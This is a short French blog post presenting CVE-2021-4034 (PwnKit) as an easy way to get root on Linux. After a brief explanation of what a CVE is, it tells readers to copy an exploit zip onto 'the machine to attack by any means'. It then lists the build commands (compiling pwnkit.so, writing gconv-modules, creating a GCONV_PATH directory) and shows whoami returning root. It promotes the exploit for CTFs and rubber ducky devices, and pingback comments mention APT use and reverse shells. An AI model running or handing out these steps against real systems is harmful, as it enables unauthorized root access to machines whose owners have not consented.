CVE-2021-4034 // Privilege escalation linux
Vous voulez un exploit simple et facile à mettre en place pour passer Root sur système Linux ?
voici le CVE-2021-4034, très simple d’application et pourtant très efficace.
Qu’est-ce qu’un CVE ?
Un CVE pour Common Vulnerabilities and Exposures est finalemnt une faille connu, suivit de l’année de découverte et son numéro dans la file.
Certains sont de petite faille difficile à mettre en oeuvre, d’autre sont très grosses failles facilement exploitable.
Et aujourd’hui nous nous intéressons à ça, une faille simple à mettre en oeuvre et terriblement efficace.
Je modèrerai mes propos car à l’heure ou j’écris ses lignes, Kali est déjà patché, la faille est comblée.
Exploitation
Le CVE se compose d’un fichier zip trouvable à cette adresse : CVE-2021-4034
Il vous suffit de télécharger le zip, de l’insérer dans la machine à attaquer par quelque moyen que ce soit l’extraire et ensuite d’effectuer un « make » dans un terminal.
Vous passez alors immédiatement root.
Commande == make
cc -Wall –shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall cve-2021-4034.c -o cve-2021-4034
echo « module UTF-8// PWNKIT// pwnkit 1 » > gconv-modules
mkdir -p GCONV_PATH=.
cp /usr/bin/true GCONV_PATH=./pwnkit.so:.
commande == ./cve-2021-4034
commande == whoami
root
Quoi de plus simple ? Voici un outil facile pour vos CTF ou pour votre rubber ducky…
Du privilege escalation sur linux facile d’emploi.
2 thoughts on “CVE-2021-4034 // Privilege escalation linux”
Comments are closed.
[…] Ici, je vais vous présenter le fameux guide du débutant, traduit en français, qui est distribué aux nouvelles recrues. Les APT Chinois utilisent aussi beaucoup RouterScan et tous utilisent cette CVE contre Linux […]
[…] reverse shell facilement. Je vais vous l’avouer, je voulais vous montrer le résultat avec la CVE-2021-4034 mais ça a été patché il y a peu. Mais ce n’est que parti remise […]